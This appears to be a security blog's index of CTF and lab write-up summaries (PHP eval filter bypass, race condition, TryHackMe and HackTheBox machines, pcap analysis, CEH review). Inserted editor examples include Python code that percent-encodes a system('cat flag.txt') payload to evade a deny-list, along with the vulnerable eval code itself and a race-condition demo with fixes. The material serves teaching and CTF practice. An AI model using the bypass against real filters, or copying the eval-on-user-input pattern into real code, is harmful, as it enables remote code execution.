Bypass square - Web - NaScon'23

In this challenge, we have to bypass two preg_match filters to get the flag.

The given code:

<?php
#read flag.txt
highlight_file(__FILE__);
$code = $_GET['cmd'];
$blocked_functions = '/(exec|shell_exec|system|`)/i';
if (preg_match($blocked_functions, $code)) {
    die("Hacking attempt detected");
} else {
    $blocked_functions = "/flag/i";
    if (preg_match($blocked_functions, $code)) {
        die("Hacking attempt detected");
    } else {
        eval(urldecode($code));
    }
}
?>

Initially, it highlights the code file. Then it stores the 'cmd' GET parameter in $code and blocks the common shell-execution functions (exec, shell_exec, system and backticks) through which we could execute shell commands....
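The important property of the snippet above is the ordering: both preg_match checks run on the raw parameter, but eval() receives urldecode($code), so whatever the attacker percent-encodes is invisible to the filters and is restored just before execution. The following is an added example (editor's code, not the challenge author's write-up) that models the two filters in Python, shows a fully percent-encoded payload passing the vulnerable ordering, and shows the same payload being rejected once decoding happens before filtering. The names vulnerable_gate, hardened_gate and encode_for_bypass are assumptions made for this illustration; the regexes are the challenge's own.

```python
import re
from typing import Optional
from urllib.parse import quote, unquote_plus

# The two filters from the challenge, applied in the same order as the PHP code.
BLOCKED_FUNCTIONS = re.compile(r"(exec|shell_exec|system|`)", re.IGNORECASE)
BLOCKED_FLAG = re.compile(r"flag", re.IGNORECASE)


def vulnerable_gate(code: str) -> Optional[str]:
    """Mirror of the challenge: filter the raw parameter, THEN urldecode it.

    `code` is the value as PHP sees it in $_GET['cmd'] (the web server has
    already removed one layer of URL encoding).  Returns the string that
    would reach eval(), or None if the request is rejected.
    """
    if BLOCKED_FUNCTIONS.search(code) or BLOCKED_FLAG.search(code):
        return None
    return unquote_plus(code)  # unquote_plus matches PHP urldecode() ('+' -> ' ')


def hardened_gate(code: str) -> Optional[str]:
    """Corrected ordering: decode first, then filter the text eval() would run."""
    decoded = unquote_plus(code)
    if BLOCKED_FUNCTIONS.search(decoded) or BLOCKED_FLAG.search(decoded):
        return None
    return decoded


def encode_for_bypass(payload: str) -> str:
    """Percent-encode every character of the payload (hypothetical helper).

    After encoding, the only letters left are pairs of hex digits between
    '%' signs, so neither regex can find 'exec', 'system', 'flag' or '`'.
    """
    return "".join(f"%{ord(c):02X}" for c in payload)


def as_query_value(encoded: str) -> str:
    """Add the extra layer the web server strips: '%' becomes '%25' in the URL."""
    return quote(encoded, safe="")


if __name__ == "__main__":
    payload = "system('cat flag.txt');"          # constructed sample payload
    encoded = encode_for_bypass(payload)
    print("raw payload rejected:      ", vulnerable_gate(payload) is None)
    print("encoded passes, eval sees: ", vulnerable_gate(encoded))
    print("hardened order rejects it: ", hardened_gate(encoded) is None)
    print("send as ?cmd=" + as_query_value(encoded))
```

The fix in hardened_gate is the minimal one for this ordering bug; the real lesson is that a deny-list in front of eval() is not a security boundary at all, and the only robust change is to remove eval() on user input entirely.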

February 2, 2024 · 2 min · 0xt0pus

TryHackMe Cmess machine Walkthrough

Setup

The following entry is added to /etc/hosts:

10.10.57.136 cmess.thm

Enumeration

An Nmap scan of all ports is run. The following was the result of the scan.

┌──(kali㉿kali)-[~/Desktop/tryhackme/cmess]
└─$ nmap 10.10.57.136 -p- --min-rate 2500
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-31 16:44 EDT
Warning: 10.10.57.136 giving up on port because retransmission cap hit (10).
Nmap scan report for cmess.thm (10.10.57.136)
Host is up (0.18s latency).
Not shown: 65507 closed tcp ports (conn-refused), 26 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 43....

October 8, 2023 · 5 min · 0xt0pus

Qualifier Web security (El Banco Amarillo) - CyberHackathon'23

The web security challenge was vulnerable to a race condition. The following was the given website. The following were the user details with IDs and funds. The /dump path has a comment, which reveals the source code. The following part of the code was vulnerable to a race condition. A race window exists in the if condition: the balance check and the deduction of funds are two separate steps, so several requests sent in parallel can all pass the if condition before any of them deducts the funds....
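The check-then-deduct race the summary describes, as an added example in Python (editor's code, not the challenge's own source, which is not reproduced here). The Account class, its two transfer methods and run_parallel are assumptions made for the illustration. A threading.Barrier is used so that every concurrent request is guaranteed to have passed the balance check before any of them deducts, which is the interleaving an attacker obtains by firing requests in parallel; the hardened version performs check and deduction as one atomic step under a lock, the in-process equivalent of a conditional UPDATE ... WHERE funds >= amount in SQL.

```python
import threading
from typing import Callable, List


class Account:
    """Hypothetical account with a single integer balance."""

    def __init__(self, funds: int) -> None:
        self.funds = funds
        self._lock = threading.Lock()

    def transfer_racy(self, amount: int, gate: threading.Barrier) -> bool:
        # Vulnerable pattern: the balance check and the deduction are separate
        # steps.  The barrier models the race window: every request reaches
        # the check while the balance is still untouched.
        if self.funds >= amount:
            gate.wait()
            self.funds -= amount
            return True
        return False

    def transfer_safe(self, amount: int, gate: threading.Barrier) -> bool:
        # Hardened pattern: check and deduct under one lock, so only one
        # request can observe a sufficient balance and spend it.
        gate.wait()  # same concurrency pressure, but serialised by the lock
        with self._lock:
            if self.funds >= amount:
                self.funds -= amount
                return True
            return False


def run_parallel(transfer: Callable[[int, threading.Barrier], bool],
                 amount: int, requests: int) -> int:
    """Fire `requests` concurrent transfers; return how many succeeded."""
    gate = threading.Barrier(requests, timeout=5)
    results: List[bool] = []
    threads = [threading.Thread(target=lambda: results.append(transfer(amount, gate)))
               for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)


if __name__ == "__main__":
    # Constructed sample: a balance of 100 and five parallel transfers of 100.
    racy = Account(100)
    ok = run_parallel(racy.transfer_racy, 100, 5)
    print(f"racy:   {ok} transfers accepted, balance now {racy.funds}")

    safe = Account(100)
    ok = run_parallel(safe.transfer_safe, 100, 5)
    print(f"locked: {ok} transfers accepted, balance now {safe.funds}")
```

In a real web application the lock has to live where the state lives: a row lock (SELECT ... FOR UPDATE) or a conditional update in the database, not a mutex in one worker process, since parallel requests are normally served by different processes or hosts.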

September 9, 2023 · 3 min · 0xt0pus

HackTheBox Lame Machine WriteUps

Enumeration

Initially I tried pinging the IP address. It is reachable.

┌──(kali㉿kali)-[~]
└─$ ping 10.10.10.3 -c 3
PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data.
64 bytes from 10.10.10.3: icmp_seq=1 ttl=63 time=173 ms
64 bytes from 10.10.10.3: icmp_seq=2 ttl=63 time=189 ms
64 bytes from 10.10.10.3: icmp_seq=3 ttl=63 time=172 ms

--- 10.10.10.3 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 171.906/178.070/189.264/7.928 ms

I ran an Nmap scan of all ports on it to find the open ports....

September 7, 2023 · 3 min · 0xt0pus

Qualifier Network Security (Warmy) - CyberHackathon'23

A pcap file was given for analysis. I opened the pcap file in Wireshark and applied the http filter to show only HTTP requests. There was a zip file that was retrieved over HTTP, but there was nothing interesting in it. I moved on and found that many requests were being made to the /f_data/data endpoint. All of the requests received a 403 Forbidden response except the last one, which received 200 OK....

September 7, 2023 · 2 min · 0xt0pus

CEH Exam Review

In the following blog post, I will be recounting my personal experience taking the CEH practical exam, while also providing valuable guidance on how to prepare for this beginner-friendly certification.

General Info about the CEH Practical

Price: $550 (without training)
Questions: 20
Passing score: 70% (14/20)
Allowed time: 6 hours
Proctored? Yes
Link to purchase: Here

Cost

Back in November 2022, during the Cyber Monday deal, I purchased the exam voucher for a cost of $150....

March 20, 2023 · 3 min · 0xt0pus